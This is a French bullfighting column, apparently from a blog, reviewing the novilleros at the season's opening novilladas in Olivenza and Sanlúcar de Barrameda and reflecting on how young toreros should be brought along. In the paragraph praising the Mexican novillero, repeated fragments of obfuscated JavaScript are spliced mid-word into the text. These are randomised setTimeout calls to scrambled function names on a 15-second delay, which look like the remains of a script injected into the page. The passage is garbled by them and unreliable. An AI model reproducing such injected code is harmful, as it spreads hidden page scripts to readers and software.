HORIZON NOVILLERO

Alors qu’il pleuvait des critiques sur les organisateurs de Séville qui avaient rendu publics les combinaisons de la feria et le prix des places, en fin de semaine le soleil faisait son apparition du côté d’Olivenza avec une double séance de novilladas piquées très prometteuses, alors qu’ici, dans le Sud, à Sanlucar de Barrameda, s’ouvrait la saison de manière classique avec une novillada piquée.

De ces bourgeons-ci et d’autres devra s’alimenter la Fiesta dans l’avenir. Il faut maintenant les arroser – en les faisant toréer pour qu’ils ne fanent pas- avec cette double composante de la carotte et du bâton si nécessaires pour qu’ils poussent forts et robustes et ne s’endorment pas sur leurs lauriers. Il ne s’agit pas, comme le croient beaucoup, de les cocooner, de leur offrir des oreillettes de village et de leur fondre les oreilles à force de leur dire qu’ils sont tellement bons et valent tant. Il ne s’agit pas non plus de les jeter aux lions, de leur voler des oreilles vraiment méritées –je me souviens encore de celle de El Madrileño à Las Ventas qui devrait faire pâlir encore de honte le président qui ne la lui concéda point- en leur refusant le pain et le sel  et se montrant aussi exigeants qu’avec les figuras.

Ni trop, ni trop peu. L’équilibre ici, comme dans bien d’autres situations, est primordial pour que ces garçons ne croient pas être ce qu’ils ne sont pas et ne soient pas déçus comme s’ils ne servaient à rien. En tout cas, la dure réalité c’est que ce monde configure de la tauromachie configure un environnement dur et inclément et qu’il est très difficile d’y survivre. Il est indispensable qu’ils aient un minimum de courage, une certaine intelligence pour le toreo et fondamentalement une aficion à toute épreuve.

De ce qui est bon et de ce qui est mauvais, il faut apprendre. Personne d’autre ne sait mieux que le torero comment il a été, ce qui l’a vraiment satisfait, ce qui est resté à mi chemin et ce qu’il n’a pas été capable de faire. C’est la seule façon de progresser en alimentant les espérances et tout ceci devrait être retenu par Espada, Terrón, Varea, Posada, Aguado, Carballo et Ginés Marín ; ce dernier avec la satisfaction d’avoir confirmé les énormes attentes de la saison dernière, car il possède d’indéniables qualités qu’il doit continuer d’améliorer et de peaufiner car on attend de lui qu’il devienne une véritable figura de la tauromachie. Mais c’est encore loin. Aujourd’hui il faut continuer de rêver et ne jamais se satisfaire. Frôler l’utopie doit être son but et il doit s’y atteler avec cette belle conception qu’il a, les arômes qu’il exhale et ce courage qui l’assiste.

Encore plus lointaine est la gloire pour ces bécerristes de Sanlucar, plus inexpérimentés et avec plus d’examens devant eux pour accéder ne serait-ce qu’au escalafon où se situent les précédents. J’ai été intéressé par la rejoneadora Léa Vicent, par sa façon de poser les réjons et de s’imposer à certains chevaux réticents ; j’ai aussi bien aimé le novillero mexicain, Alejandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andro Sánchez –trop grandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and pour ces petits novillos- qui devant le novillo le plus compliqué de l’après-midi sut le dominer et lui soutirer des passes, prolongeant sa courte charge, lors d’une prestation en crescendo. J’ai aussi aimé les détails d’artiste de Emilio Silvera et des véroniques profondes de Rafa Serna. Quant aux deux autres –Alfonso Cadaval et Alvaro López- signalons qu’il ne suffit pas de vouloir pour faire sa route dans cette carrière si dure. C’est à leur tour de réfléchir, seul à seul, sans que personne ne vienne les tromper. Même pas cet écrit.

Les commentaires sont fermés.